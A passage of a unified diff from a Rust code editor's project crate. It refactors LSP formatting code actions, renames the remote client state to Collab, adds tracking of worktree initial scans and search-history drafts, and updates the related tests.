- if !lsp_edits.contains(&edit.text_edit) {
- lsp_edits.push(edit.text_edit);
- }
- }
- Edit::Snippet(_) => {
- zlog::warn!(
- logger =>
- "Code actions which produce snippet edits are not supported during formatting. Skipping {}",
- describe_code_action(&action),
- );
- continue 'actions;
- }
- }
}
- let edits_result = lsp_store
- .update(cx, |lsp_store, cx| {
- lsp_store.as_local_mut().unwrap().edits_from_lsp(
- &buffer.handle,
- lsp_edits,
- server.server_id(),
- op.text_document.version,
- cx,
- )
- })?
- .await;
- let Ok(resolved_edits) = edits_result else {
- zlog::warn!(
- logger =>
- "Failed to resolve edits from LSP for buffer {:?} while handling {}",
- buffer_path_abs.as_path(),
- describe_code_action(&action),
- );
- continue 'actions;
- };
- edits.extend(resolved_edits);
- }
-
- if edits.is_empty() {
- zlog::warn!(logger => "No edits resolved from LSP");
- continue;
}
-
- extend_formatting_transaction(
- buffer,
- formatting_transaction_id,
- cx,
- |buffer, cx| {
- zlog::info!(
- "Applying edits {edits:?}. Content: {:?}",
- buffer.text()
- );
- buffer.edit(edits, None, cx);
- zlog::info!("Applied edits. New Content: {:?}", buffer.text());
- },
- )?;
+ let edits_result = lsp_store
+ .update(cx, |lsp_store, cx| {
+ lsp_store.as_local_mut().unwrap().edits_from_lsp(
+ &buffer.handle,
+ lsp_edits,
+ server.server_id(),
+ op.text_document.version,
+ cx,
+ )
+ })?
+ .await;
+ let Ok(resolved_edits) = edits_result else {
+ zlog::warn!(
+ logger =>
+ "Failed to resolve edits from LSP for buffer {:?} while handling {}",
+ buffer_path_abs.as_path(),
+ describe_code_action(&action),
+ );
+ continue 'actions;
+ };
+ edits.extend(resolved_edits);
}
- // bail early if command is invalid
- let Some(command) = action.lsp_action.command() else {
- continue;
- };
-
- zlog::warn!(
- logger =>
- "Executing code action command '{}'. This may cause formatting to abort unnecessarily as well as splitting formatting into two entries in the undo history",
- &command.command,
- );
-
- let server_capabilities = server.capabilities();
- let available_commands = server_capabilities
- .execute_command_provider
- .as_ref()
- .map(|options| options.commands.as_slice())
- .unwrap_or_default();
- if !available_commands.contains(&command.command) {
- zlog::warn!(
- logger =>
- "Cannot execute a command {} not listed in the language server capabilities of server {}",
- command.command,
- server.name(),
- );
+ if edits.is_empty() {
+ zlog::warn!(logger => "No edits resolved from LSP");
continue;
}
- // noop so we just ensure buffer hasn't been edited since resolving code actions
extend_formatting_transaction(
buffer,
formatting_transaction_id,
cx,
- |_, _| {},
+ |buffer, cx| {
+ zlog::info!(
+ "Applying edits {edits:?}. Content: {:?}",
+ buffer.text()
+ );
+ buffer.edit(edits, None, cx);
+ zlog::info!("Applied edits. New Content: {:?}", buffer.text());
+ },
)?;
- zlog::info!(logger => "Executing command {}", &command.command);
+ }
- lsp_store.update(cx, |this, _| {
- this.as_local_mut()
- .unwrap()
- .last_workspace_edits_by_language_server
- .remove(&server.server_id());
- })?;
+ let Some(command) = action.lsp_action.command() else {
+ continue;
+ };
- let execute_command_result = server
- .request::<lsp::request::ExecuteCommand>(
- lsp::ExecuteCommandParams {
- command: command.command.clone(),
- arguments: command.arguments.clone().unwrap_or_default(),
- ..Default::default()
- },
- request_timeout,
- )
- .await
- .into_response();
+ zlog::warn!(
+ logger =>
+ "Executing code action command '{}'. This may cause formatting to abort unnecessarily as well as splitting formatting into two entries in the undo history",
+ &command.command,
+ );
- if execute_command_result.is_err() {
- zlog::error!(
- logger =>
- "Failed to execute command '{}' as part of {}",
- &command.command,
- describe_code_action(&action),
- );
- continue 'actions;
- }
+ let server_capabilities = server.capabilities();
+ let available_commands = server_capabilities
+ .execute_command_provider
+ .as_ref()
+ .map(|options| options.commands.as_slice())
+ .unwrap_or_default();
+ if !available_commands.contains(&command.command) {
+ zlog::warn!(
+ logger =>
+ "Cannot execute a command {} not listed in the language server capabilities of server {}",
+ command.command,
+ server.name(),
+ );
+ continue;
+ }
- let mut project_transaction_command = lsp_store.update(cx, |this, _| {
- this.as_local_mut()
- .unwrap()
- .last_workspace_edits_by_language_server
- .remove(&server.server_id())
- .unwrap_or_default()
- })?;
+ extend_formatting_transaction(
+ buffer,
+ formatting_transaction_id,
+ cx,
+ |_, _| {},
+ )?;
+ zlog::info!(logger => "Executing command {}", &command.command);
- if let Some(transaction) =
- project_transaction_command.0.remove(&buffer.handle)
- {
- zlog::trace!(
- logger =>
- "Successfully captured {} edits that resulted from command {}",
- transaction.edit_ids.len(),
- &command.command,
- );
- let transaction_id_project_transaction = transaction.id;
- buffer.handle.update(cx, |buffer, _| {
- // it may have been removed from history if push_to_history was
- // false in deserialize_workspace_edit. If so push it so we
- // can merge it with the format transaction
- // and pop the combined transaction off the history stack
- // later if push_to_history is false
- if buffer.get_transaction(transaction.id).is_none() {
- buffer.push_transaction(transaction, Instant::now());
- }
- buffer.merge_transactions(
- transaction_id_project_transaction,
- formatting_transaction_id,
- );
- });
- }
+ lsp_store.update(cx, |this, _| {
+ this.as_local_mut()
+ .unwrap()
+ .last_workspace_edits_by_language_server
+ .remove(&server.server_id());
+ })?;
- if project_transaction_command.0.is_empty() {
- continue;
- }
+ let execute_command_result = server
+ .request::<lsp::request::ExecuteCommand>(
+ lsp::ExecuteCommandParams {
+ command: command.command.clone(),
+ arguments: command.arguments.clone().unwrap_or_default(),
+ ..Default::default()
+ },
+ request_timeout,
+ )
+ .await
+ .into_response();
- let mut extra_buffers = String::new();
- for buffer in project_transaction_command.0.keys() {
- buffer.read_with(cx, |b, cx| {
- let Some(path) = b.project_path(cx) else {
- return;
- };
+ if execute_command_result.is_err() {
+ zlog::error!(
+ logger =>
+ "Failed to execute command '{}' as part of {}",
+ &command.command,
+ describe_code_action(&action),
+ );
+ continue 'actions;
+ }
- if !extra_buffers.is_empty() {
- extra_buffers.push_str(", ");
- }
- extra_buffers.push_str(path.path.as_unix_str());
- });
- }
- zlog::warn!(
+ let mut project_transaction_command = lsp_store.update(cx, |this, _| {
+ this.as_local_mut()
+ .unwrap()
+ .last_workspace_edits_by_language_server
+ .remove(&server.server_id())
+ .unwrap_or_default()
+ })?;
+
+ if let Some(transaction) = project_transaction_command.0.remove(&buffer.handle)
+ {
+ zlog::trace!(
logger =>
- "Unexpected edits to buffers other than the buffer actively being formatted due to command {}. Impacted buffers: [{}].",
+ "Successfully captured {} edits that resulted from command {}",
+ transaction.edit_ids.len(),
&command.command,
- extra_buffers,
);
- // NOTE: if this case is hit, the proper thing to do is to for each buffer, merge the extra transaction
- // into the existing transaction in project_transaction if there is one, and if there isn't one in project_transaction,
- // add it so it's included, and merge it into the format transaction when its created later
+ let transaction_id_project_transaction = transaction.id;
+ buffer.handle.update(cx, |buffer, _| {
+ // it may have been removed from history if push_to_history was
+ // false in deserialize_workspace_edit. If so push it so we
+ // can merge it with the format transaction
+ // and pop the combined transaction off the history stack
+ // later if push_to_history is false
+ if buffer.get_transaction(transaction.id).is_none() {
+ buffer.push_transaction(transaction, Instant::now());
+ }
+ buffer.merge_transactions(
+ transaction_id_project_transaction,
+ formatting_transaction_id,
+ );
+ });
+ }
+
+ if project_transaction_command.0.is_empty() {
+ continue;
+ }
+
+ let mut extra_buffers = String::new();
+ for buffer in project_transaction_command.0.keys() {
+ buffer.read_with(cx, |b, cx| {
+ let Some(path) = b.project_path(cx) else {
+ return;
+ };
+
+ if !extra_buffers.is_empty() {
+ extra_buffers.push_str(", ");
+ }
+ extra_buffers.push_str(path.path.as_unix_str());
+ });
}
+ zlog::warn!(
+ logger =>
+ "Unexpected edits to buffers other than the buffer actively being formatted due to command {}. Impacted buffers: [{}].",
+ &command.command,
+ extra_buffers,
+ );
+ // NOTE: if this case is hit, the proper thing to do is to for each buffer, merge the extra transaction
+ // into the existing transaction in project_transaction if there is one, and if there isn't one in project_transaction,
+ // add it so it's included, and merge it into the format transaction when its created later
}
}
}
@@ -3914,6 +3920,7 @@ pub struct LspStore {
pub lsp_server_capabilities: HashMap<LanguageServerId, lsp::ServerCapabilities>,
semantic_token_config: SemanticTokenConfig,
lsp_data: HashMap<BufferId, BufferLspData>,
+ buffer_reload_tasks: HashMap<BufferId, Task<anyhow::Result<()>>>,
next_hint_id: Arc<AtomicUsize>,
}
@@ -3963,10 +3970,7 @@ impl BufferLspData {
self.inlay_hints.remove_server_data(for_server);
if let Some(semantic_tokens) = &mut self.semantic_tokens {
- semantic_tokens.raw_tokens.servers.remove(&for_server);
- semantic_tokens
- .latest_invalidation_requests
- .remove(&for_server);
+ semantic_tokens.remove_server_data(for_server);
}
if let Some(folding_ranges) = &mut self.folding_ranges {
@@ -585,8 +585,7 @@ async fn raw_to_buffer_semantic_tokens(
}
Some(BufferSemanticToken {
- range: buffer_snapshot.anchor_before(start)
- ..buffer_snapshot.anchor_after(end),
+ range: buffer_snapshot.anchor_range_around(start..end),
token_type: token.token_type,
token_modifiers: token.token_modifiers,
})
@@ -611,6 +610,14 @@ pub struct SemanticTokensData {
update: Option<(Global, SemanticTokensTask)>,
}
+impl SemanticTokensData {
+ pub(super) fn remove_server_data(&mut self, server_id: LanguageServerId) {
+ self.raw_tokens.servers.remove(&server_id);
+ self.latest_invalidation_requests.remove(&server_id);
+ self.update = None;
+ }
+}
+
/// All the semantic token tokens for a buffer.
///
/// This aggregates semantic tokens from multiple language servers in a specific order.
@@ -33,7 +33,7 @@ pub mod search_history;
pub mod yarn;
use dap::inline_value::{InlineValueLocation, VariableLookupKind, VariableScope};
-use itertools::Either;
+use itertools::{Either, Itertools};
use crate::{
git_store::GitStore,
@@ -43,12 +43,11 @@ use crate::{
worktree_store::WorktreeIdCounter,
};
pub use agent_registry_store::{AgentRegistryStore, RegistryAgent};
-pub use agent_server_store::{
- AgentServerStore, AgentServersUpdated, ExternalAgentServerName, ExternalAgentSource,
-};
+pub use agent_server_store::{AgentId, AgentServerStore, AgentServersUpdated, ExternalAgentSource};
pub use git_store::{
ConflictRegion, ConflictSet, ConflictSetSnapshot, ConflictSetUpdate,
git_traversal::{ChildEntriesGitIter, GitEntry, GitEntryRef, GitTraversal},
+ linked_worktree_short_name, worktrees_directory_for_repo,
};
pub use manifest_tree::ManifestTree;
pub use project_search::{Search, SearchResults};
@@ -121,6 +120,7 @@ use std::{
borrow::Cow,
collections::BTreeMap,
ffi::OsString,
+ future::Future,
ops::{Not as _, Range},
path::{Path, PathBuf},
pin::pin,
@@ -135,6 +135,7 @@ use text::{Anchor, BufferId, OffsetRangeExt, Point, Rope};
use toolchain_store::EmptyToolchainStore;
use util::{
ResultExt as _, maybe,
+ path_list::PathList,
paths::{PathStyle, SanitizedPath, is_absolute},
rel_path::RelPath,
};
@@ -306,7 +307,7 @@ enum ProjectClientState {
/// Multi-player mode but still a local project.
Shared { remote_id: u64 },
/// Multi-player mode but working on a remote project.
- Remote {
+ Collab {
sharing_has_stopped: bool,
capability: Capability,
remote_id: u64,
@@ -1815,7 +1816,7 @@ impl Project {
client_subscriptions: Default::default(),
_subscriptions: vec![cx.on_release(Self::release)],
collab_client: client.clone(),
- client_state: ProjectClientState::Remote {
+ client_state: ProjectClientState::Collab {
sharing_has_stopped: false,
capability: Capability::ReadWrite,
remote_id,
@@ -1933,7 +1934,7 @@ impl Project {
ProjectClientState::Shared { .. } => {
let _ = self.unshare_internal(cx);
}
- ProjectClientState::Remote { remote_id, .. } => {
+ ProjectClientState::Collab { remote_id, .. } => {
let _ = self.collab_client.send(proto::LeaveProject {
project_id: *remote_id,
});
@@ -2078,6 +2079,12 @@ impl Project {
self.worktree_store.clone()
}
+ /// Returns a future that resolves when all visible worktrees have completed
+ /// their initial scan.
+ pub fn wait_for_initial_scan(&self, cx: &App) -> impl Future<Output = ()> + use<> {
+ self.worktree_store.read(cx).wait_for_initial_scan()
+ }
+
#[inline]
pub fn context_server_store(&self) -> Entity<ContextServerStore> {
self.context_server_store.clone()
@@ -2159,7 +2166,7 @@ impl Project {
match self.client_state {
ProjectClientState::Local => None,
ProjectClientState::Shared { remote_id, .. }
- | ProjectClientState::Remote { remote_id, .. } => Some(remote_id),
+ | ProjectClientState::Collab { remote_id, .. } => Some(remote_id),
}
}
@@ -2213,7 +2220,7 @@ impl Project {
#[inline]
pub fn replica_id(&self) -> ReplicaId {
match self.client_state {
- ProjectClientState::Remote { replica_id, .. } => replica_id,
+ ProjectClientState::Collab { replica_id, .. } => replica_id,
_ => {
if self.remote_client.is_some() {
ReplicaId::REMOTE_SERVER
@@ -2287,6 +2294,32 @@ impl Project {
self.worktree_store.read(cx).visible_worktrees(cx)
}
+ pub fn default_path_list(&self, cx: &App) -> PathList {
+ let worktree_roots = self
+ .visible_worktrees(cx)
+ .sorted_by(|left, right| {
+ left.read(cx)
+ .is_single_file()
+ .cmp(&right.read(cx).is_single_file())
+ })
+ .filter_map(|worktree| {
+ let worktree = worktree.read(cx);
+ let path = worktree.abs_path();
+ if worktree.is_single_file() {
+ Some(path.parent()?.to_path_buf())
+ } else {
+ Some(path.to_path_buf())
+ }
+ })
+ .collect::<Vec<_>>();
+
+ if worktree_roots.is_empty() {
+ PathList::new(&[paths::home_dir().as_path()])
+ } else {
+ PathList::new(&worktree_roots)
+ }
+ }
+
#[inline]
pub fn worktree_for_root_name(&self, root_name: &str, cx: &App) -> Option<Entity<Worktree>> {
self.visible_worktrees(cx)
@@ -2727,7 +2760,7 @@ impl Project {
} else {
Capability::ReadOnly
};
- if let ProjectClientState::Remote { capability, .. } = &mut self.client_state {
+ if let ProjectClientState::Collab { capability, .. } = &mut self.client_state {
if *capability == new_capability {
return;
}
@@ -2740,7 +2773,7 @@ impl Project {
}
fn disconnected_from_host_internal(&mut self, cx: &mut App) {
- if let ProjectClientState::Remote {
+ if let ProjectClientState::Collab {
sharing_has_stopped,
..
} = &mut self.client_state
@@ -2767,7 +2800,7 @@ impl Project {
#[inline]
pub fn is_disconnected(&self, cx: &App) -> bool {
match &self.client_state {
- ProjectClientState::Remote {
+ ProjectClientState::Collab {
sharing_has_stopped,
..
} => *sharing_has_stopped,
@@ -2789,7 +2822,7 @@ impl Project {
#[inline]
pub fn capability(&self) -> Capability {
match &self.client_state {
- ProjectClientState::Remote { capability, .. } => *capability,
+ ProjectClientState::Collab { capability, .. } => *capability,
ProjectClientState::Shared { .. } | ProjectClientState::Local => Capability::ReadWrite,
}
}
@@ -2805,7 +2838,7 @@ impl Project {
ProjectClientState::Local | ProjectClientState::Shared { .. } => {
self.remote_client.is_none()
}
- ProjectClientState::Remote { .. } => false,
+ ProjectClientState::Collab { .. } => false,
}
}
@@ -2816,7 +2849,7 @@ impl Project {
ProjectClientState::Local | ProjectClientState::Shared { .. } => {
self.remote_client.is_some()
}
- ProjectClientState::Remote { .. } => false,
+ ProjectClientState::Collab { .. } => false,
}
}
@@ -2825,7 +2858,7 @@ impl Project {
pub fn is_via_collab(&self) -> bool {
match &self.client_state {
ProjectClientState::Local | ProjectClientState::Shared { .. } => false,
- ProjectClientState::Remote { .. } => true,
+ ProjectClientState::Collab { .. } => true,
}
}
@@ -3636,11 +3669,11 @@ impl Project {
event: &BufferEvent,
cx: &mut Context<Self>,
) -> Option<()> {
- if matches!(event, BufferEvent::Edited | BufferEvent::Reloaded) {
+ if matches!(event, BufferEvent::Edited { .. } | BufferEvent::Reloaded) {
self.request_buffer_diff_recalculation(&buffer, cx);
}
- if matches!(event, BufferEvent::Edited) {
+ if matches!(event, BufferEvent::Edited { .. }) {
cx.emit(Event::BufferEdited);
}
@@ -4498,7 +4531,7 @@ impl Project {
match &self.client_state {
ProjectClientState::Shared { .. } => true,
ProjectClientState::Local => false,
- ProjectClientState::Remote { .. } => true,
+ ProjectClientState::Collab { .. } => true,
}
}
@@ -5499,25 +5532,51 @@ impl Project {
let key = (worktree_id, path);
log::debug!("handle_create_file_for_peer: looking up key={:?}", key);
- let mut files = downloading_files.lock();
- log::trace!(
- "handle_create_file_for_peer: current downloading_files keys: {:?}",
- files.keys().collect::<Vec<_>>()
- );
+ let empty_file_destination: Option<PathBuf> = {
+ let mut files = downloading_files.lock();
+ log::trace!(
+ "handle_create_file_for_peer: current downloading_files keys: {:?}",
+ files.keys().collect::<Vec<_>>()
+ );
+
+ if let Some(file_entry) = files.get_mut(&key) {
+ file_entry.total_size = state.content_size;
+ file_entry.file_id = Some(state.id);
+ log::debug!(
+ "handle_create_file_for_peer: updated file entry: total_size={}, file_id={}",
+ state.content_size,
+ state.id
+ );
+ } else {
+ log::warn!(
+ "handle_create_file_for_peer: key={:?} not found in downloading_files",
+ key
+ );
+ }
+
+ if state.content_size == 0 {
+ // No chunks will arrive for an empty file; write it now.
+ files.remove(&key).map(|entry| entry.destination_path)
+ } else {
+ None
+ }
+ };
- if let Some(file_entry) = files.get_mut(&key) {
- file_entry.total_size = state.content_size;
- file_entry.file_id = Some(state.id);
+ if let Some(destination) = empty_file_destination {
log::debug!(
- "handle_create_file_for_peer: updated file entry: total_size={}, file_id={}",
- state.content_size,
- state.id
- );
- } else {
- log::warn!(
- "handle_create_file_for_peer: key={:?} not found in downloading_files",
- key
+ "handle_create_file_for_peer: writing empty file to {:?}",
+ destination
);
+ match smol::fs::write(&destination, &[] as &[u8]).await {
+ Ok(_) => log::info!(
+ "handle_create_file_for_peer: successfully wrote file to {:?}",
+ destination
+ ),
+ Err(e) => log::error!(
+ "handle_create_file_for_peer: failed to write empty file: {:?}",
+ e
+ ),
+ }
}
} else {
log::warn!("handle_create_file_for_peer: State has no file field");
@@ -5597,7 +5656,7 @@ impl Project {
fn synchronize_remote_buffers(&mut self, cx: &mut Context<Self>) -> Task<Result<()>> {
let project_id = match self.client_state {
- ProjectClientState::Remote {
+ ProjectClientState::Collab {
sharing_has_stopped,
remote_id,
..
@@ -164,6 +164,11 @@ impl Search {
let buffer = handle.read(cx);
if !buffers.is_searchable(&buffer.remote_id()) {
continue;
+ } else if buffer
+ .file()
+ .is_some_and(|file| file.disk_state().is_deleted())
+ {
+ continue;
} else if let Some(entry_id) = buffer.entry_id(cx) {
open_buffers.insert(entry_id);
} else {
@@ -586,6 +591,9 @@ impl Search {
.filter(|buffer| {
let b = buffer.read(cx);
if let Some(file) = b.file() {
+ if file.disk_state().is_deleted() {
+ return false;
+ }
if !search_query.match_path(file.path()) {
return false;
}
@@ -19,12 +19,19 @@ pub enum QueryInsertionBehavior {
#[derive(Default, Debug, Clone, PartialEq, Eq, Hash)]
pub struct SearchHistoryCursor {
selection: Option<usize>,
+ draft: Option<String>,
}
impl SearchHistoryCursor {
- /// Resets the selection to `None`.
+ /// Resets the selection to `None` and clears the draft.
pub fn reset(&mut self) {
self.selection = None;
+ self.draft = None;
+ }
+
+ /// Takes the stored draft query, if any.
+ pub fn take_draft(&mut self) -> Option<String> {
+ self.draft.take()
}
}
@@ -45,6 +52,8 @@ impl SearchHistory {
}
pub fn add(&mut self, cursor: &mut SearchHistoryCursor, search_string: String) {
+ cursor.draft = None;
+
if self.insertion_behavior == QueryInsertionBehavior::ReplacePreviousIfContains
&& let Some(previously_searched) = self.history.back_mut()
&& search_string.contains(previously_searched.as_str())
@@ -81,7 +90,23 @@ impl SearchHistory {
/// Get the previous history entry using the given `SearchHistoryCursor`.
/// Uses the last element in the history when there is no cursor.
- pub fn previous(&mut self, cursor: &mut SearchHistoryCursor) -> Option<&str> {
+ ///
+ /// `current_query` is the current text in the search editor. If it differs
+ /// from the history entry at the cursor position (or if the cursor has no
+ /// selection), it is saved as a draft so it can be restored later.
+ pub fn previous(
+ &mut self,
+ cursor: &mut SearchHistoryCursor,
+ current_query: &str,
+ ) -> Option<&str> {
+ let matches_history = cursor
+ .selection
+ .and_then(|i| self.history.get(i))
+ .is_some_and(|entry| entry == current_query);
+ if !matches_history {
+ cursor.draft = Some(current_query.to_string());
+ }
+
let prev_index = match cursor.selection {
Some(index) => index.checked_sub(1)?,
None => self.history.len().checked_sub(1)?,
@@ -985,6 +985,10 @@ impl ContextProvider for BasicContextProvider {
task_variables.insert(VariableName::File, path.to_string_lossy().into_owned());
}
+ if let Some(language) = buffer.language() {
+ task_variables.insert(VariableName::Language, language.name().to_string());
+ }
+
Task::ready(Ok(task_variables))
}
}
@@ -1,4 +1,5 @@
use std::{
+ future::Future,
path::{Path, PathBuf},
sync::{
Arc,
@@ -15,6 +16,7 @@ use gpui::{
WeakEntity,
};
use itertools::Either;
+use postage::{prelude::Stream as _, watch};
use rpc::{
AnyProtoClient, ErrorExt, TypedEnvelope,
proto::{self, REMOTE_SERVER_PROJECT_ID},
@@ -75,6 +77,7 @@ pub struct WorktreeStore {
#[allow(clippy::type_complexity)]
loading_worktrees:
HashMap<Arc<SanitizedPath>, Shared<Task<Result<Entity<Worktree>, Arc<anyhow::Error>>>>>,
+ initial_scan_complete: (watch::Sender<bool>, watch::Receiver<bool>),
state: WorktreeStoreState,
}
@@ -119,6 +122,7 @@ impl WorktreeStore {
worktrees_reordered: false,
scanning_enabled: true,
retain_worktrees,
+ initial_scan_complete: watch::channel_with(true),
state: WorktreeStoreState::Local { fs },
}
}
@@ -139,6 +143,7 @@ impl WorktreeStore {
worktrees_reordered: false,
scanning_enabled: true,
retain_worktrees,
+ initial_scan_complete: watch::channel_with(true),
state: WorktreeStoreState::Remote {
upstream_client,
upstream_project_id,
@@ -174,6 +179,57 @@ impl WorktreeStore {
pub fn disable_scanner(&mut self) {
self.scanning_enabled = false;
+ *self.initial_scan_complete.0.borrow_mut() = true;
+ }
+
+ /// Returns a future that resolves when all visible worktrees have completed
+ /// their initial scan (entries populated, git repos detected).
+ pub fn wait_for_initial_scan(&self) -> impl Future<Output = ()> + use<> {
+ let mut rx = self.initial_scan_complete.1.clone();
+ async move {
+ let mut done = *rx.borrow();
+ while !done {
+ if let Some(value) = rx.recv().await {
+ done = value;
+ } else {
+ break;
+ }
+ }
+ }
+ }
+
+ /// Returns whether all visible worktrees have completed their initial scan.
+ pub fn initial_scan_completed(&self) -> bool {
+ *self.initial_scan_complete.1.borrow()
+ }
+
+ /// Checks whether all visible worktrees have completed their initial scan
+ /// and no worktree creations are pending, and updates the watch channel accordingly.
+ fn update_initial_scan_state(&mut self, cx: &App) {
+ let complete = self.loading_worktrees.is_empty()
+ && self
+ .visible_worktrees(cx)
+ .all(|wt| wt.read(cx).completed_scan_id() >= 1);
+ *self.initial_scan_complete.0.borrow_mut() = complete;
+ }
+
+ /// Spawns a detached task that waits for a worktree's initial scan to complete,
+ /// then rechecks and updates the aggregate initial scan state.
+ fn observe_worktree_scan_completion(
+ &mut self,
+ worktree: &Entity<Worktree>,
+ cx: &mut Context<Self>,
+ ) {
+ let await_scan = worktree.update(cx, |worktree, _cx| worktree.wait_for_snapshot(1));
+ cx.spawn(async move |this, cx| {
+ await_scan.await.ok();
+ this.update(cx, |this, cx| {
+ this.update_initial_scan_state(cx);
+ })
+ .ok();
+ anyhow::Ok(())
+ })
+ .detach();
}
/// Iterates through all worktrees, including ones that don't appear in the project panel
@@ -554,12 +610,22 @@ impl WorktreeStore {
self.loading_worktrees
.insert(abs_path.clone(), task.shared());
+
+ if visible && self.scanning_enabled {
+ *self.initial_scan_complete.0.borrow_mut() = false;
+ }
}
let task = self.loading_worktrees.get(&abs_path).unwrap().clone();
cx.spawn(async move |this, cx| {
let result = task.await;
- this.update(cx, |this, _| this.loading_worktrees.remove(&abs_path))
- .ok();
+ this.update(cx, |this, cx| {
+ this.loading_worktrees.remove(&abs_path);
+ if !visible || !this.scanning_enabled || result.is_err() {
+ this.update_initial_scan_state(cx);
+ }
+ })
+ .ok();
+
match result {
Ok(worktree) => {
if !is_via_collab {
@@ -578,6 +644,13 @@ impl WorktreeStore {
);
});
}
+
+ this.update(cx, |this, cx| {
+ if this.scanning_enabled && visible {
+ this.observe_worktree_scan_completion(&worktree, cx);
+ }
+ })
+ .ok();
}
Ok(worktree)
}
@@ -768,6 +841,7 @@ impl WorktreeStore {
false
}
});
+ self.update_initial_scan_state(cx);
self.send_project_updates(cx);
}
@@ -3,7 +3,7 @@ mod go_locator {
use dap::{DapLocator, adapters::DebugAdapterName};
use gpui::TestAppContext;
use project::debugger::locators::go::{DelveLaunchRequest, GoLocator};
- use task::{HideStrategy, RevealStrategy, RevealTarget, Shell, TaskTemplate};
+ use task::{HideStrategy, RevealStrategy, RevealTarget, SaveStrategy, Shell, TaskTemplate};
#[gpui::test]
async fn test_create_scenario_for_go_build(_: &mut TestAppContext) {
let locator = GoLocator;
@@ -22,6 +22,7 @@ mod go_locator {
tags: vec![],
show_summary: true,
show_command: true,
+ save: SaveStrategy::default(),
};
let scenario = locator
@@ -49,6 +50,7 @@ mod go_locator {
tags: vec![],
show_summary: true,
show_command: true,
+ save: SaveStrategy::default(),
};
let scenario = locator
@@ -187,6 +189,7 @@ mod go_locator {
tags: vec![],
show_summary: true,
show_command: true,
+ save: SaveStrategy::default(),
};
let scenario = locator
@@ -221,6 +224,7 @@ mod python_locator {
shell: task::Shell::System,
show_summary: false,
show_command: false,
+ save: task::SaveStrategy::default(),
};
let expected_scenario = DebugScenario {
@@ -10,7 +10,6 @@ impl ExternalAgentServer for NoopExternalAgent {
fn get_command(
&mut self,
_extra_env: HashMap<String, String>,
- _status_tx: Option<watch::Sender<SharedString>>,
_new_version_available_tx: Option<watch::Sender<Option<String>>>,
_cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>> {
@@ -28,7 +27,7 @@ impl ExternalAgentServer for NoopExternalAgent {
#[test]
fn external_agent_server_name_display() {
- let name = ExternalAgentServerName(SharedString::from("Ext: Tool"));
+ let name = AgentId(SharedString::from("Ext: Tool"));
let mut s = String::new();
write!(&mut s, "{name}").unwrap();
assert_eq!(s, "Ext: Tool");
@@ -40,7 +39,7 @@ fn sync_extension_agents_removes_previous_extension_entries() {
// Seed with a couple of agents that will be replaced by extensions
store.external_agents.insert(
- ExternalAgentServerName(SharedString::from("foo-agent")),
+ AgentId(SharedString::from("foo-agent")),
ExternalAgentEntry::new(
Box::new(NoopExternalAgent) as Box<dyn ExternalAgentServer>,
ExternalAgentSource::Custom,
@@ -49,7 +48,7 @@ fn sync_extension_agents_removes_previous_extension_entries() {
),
);
store.external_agents.insert(
- ExternalAgentServerName(SharedString::from("bar-agent")),
+ AgentId(SharedString::from("bar-agent")),
ExternalAgentEntry::new(
Box::new(NoopExternalAgent) as Box<dyn ExternalAgentServer>,
ExternalAgentSource::Custom,
@@ -58,7 +57,7 @@ fn sync_extension_agents_removes_previous_extension_entries() {
),
);
store.external_agents.insert(
- ExternalAgentServerName(SharedString::from("custom")),
+ AgentId(SharedString::from("custom")),
ExternalAgentEntry::new(
Box::new(NoopExternalAgent) as Box<dyn ExternalAgentServer>,
ExternalAgentSource::Custom,
@@ -9,14 +9,14 @@ use std::{any::Any, path::PathBuf, sync::Arc};
#[test]
fn extension_agent_constructs_proper_display_names() {
// Verify the display name format for extension-provided agents
- let name1 = ExternalAgentServerName(SharedString::from("Extension: Agent"));
+ let name1 = AgentId(SharedString::from("Extension: Agent"));
assert!(name1.0.contains(": "));
- let name2 = ExternalAgentServerName(SharedString::from("MyExt: MyAgent"));
+ let name2 = AgentId(SharedString::from("MyExt: MyAgent"));
assert_eq!(name2.0, "MyExt: MyAgent");
// Non-extension agents shouldn't have the separator
- let custom = ExternalAgentServerName(SharedString::from("custom"));
+ let custom = AgentId(SharedString::from("custom"));
assert!(!custom.0.contains(": "));
}
@@ -26,7 +26,6 @@ impl ExternalAgentServer for NoopExternalAgent {
fn get_command(
&mut self,
_extra_env: HashMap<String, String>,
- _status_tx: Option<watch::Sender<SharedString>>,
_new_version_available_tx: Option<watch::Sender<Option<String>>>,
_cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>> {
@@ -48,7 +47,7 @@ fn sync_removes_only_extension_provided_agents() {
// Seed with extension agents (contain ": ") and custom agents (don't contain ": ")
store.external_agents.insert(
- ExternalAgentServerName(SharedString::from("Ext1: Agent1")),
+ AgentId(SharedString::from("Ext1: Agent1")),
ExternalAgentEntry::new(
Box::new(NoopExternalAgent) as Box<dyn ExternalAgentServer>,
ExternalAgentSource::Extension,
@@ -57,7 +56,7 @@ fn sync_removes_only_extension_provided_agents() {
),
);
store.external_agents.insert(
- ExternalAgentServerName(SharedString::from("Ext2: Agent2")),
+ AgentId(SharedString::from("Ext2: Agent2")),
ExternalAgentEntry::new(
Box::new(NoopExternalAgent) as Box<dyn ExternalAgentServer>,
ExternalAgentSource::Extension,
@@ -66,7 +65,7 @@ fn sync_removes_only_extension_provided_agents() {
),
);
store.external_agents.insert(
- ExternalAgentServerName(SharedString::from("custom-agent")),
+ AgentId(SharedString::from("custom-agent")),
ExternalAgentEntry::new(
Box::new(NoopExternalAgent) as Box<dyn ExternalAgentServer>,
ExternalAgentSource::Custom,
@@ -85,7 +84,7 @@ fn sync_removes_only_extension_provided_agents() {
assert!(
store
.external_agents
- .contains_key(&ExternalAgentServerName(SharedString::from("custom-agent")))
+ .contains_key(&AgentId(SharedString::from("custom-agent")))
);
}
@@ -118,7 +117,7 @@ fn archive_launcher_constructs_with_all_fields() {
};
// Verify display name construction
- let expected_name = ExternalAgentServerName(SharedString::from("GitHub Agent"));
+ let expected_name = AgentId(SharedString::from("GitHub Agent"));
assert_eq!(expected_name.0, "GitHub Agent");
}
@@ -171,7 +170,7 @@ async fn archive_agent_uses_extension_and_agent_id_for_cache_key(cx: &mut TestAp
fn sync_extension_agents_registers_archive_launcher() {
use extension::AgentServerManifestEntry;
- let expected_name = ExternalAgentServerName(SharedString::from("Release Agent"));
+ let expected_name = AgentId(SharedString::from("Release Agent"));
assert_eq!(expected_name.0, "Release Agent");
// Verify the manifest entry structure for archive-based installation
@@ -1176,14 +1176,13 @@ mod git_traversal {
}
mod git_worktrees {
- use std::path::PathBuf;
-
use fs::FakeFs;
use gpui::TestAppContext;
+ use project::worktrees_directory_for_repo;
